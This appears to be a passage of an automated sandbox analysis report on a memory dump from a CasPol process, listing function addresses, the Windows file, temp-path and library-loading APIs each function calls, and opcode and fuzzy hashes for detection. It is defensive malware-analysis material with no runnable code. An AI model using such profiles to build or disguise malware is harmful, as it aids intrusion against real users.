                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                    Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                    • API String ID: 252777609-2138825249
                                                                                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                    Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                    Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1023896661-0
                                                                                                                                                                                    • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                    • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                                    • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2445788494-0
                                                                                                                                                                                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                    Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1381354015-0
                                                                                                                                                                                    • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                    Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                    Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                    • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2154303073-0
                                                                                                                                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                    • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                    • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
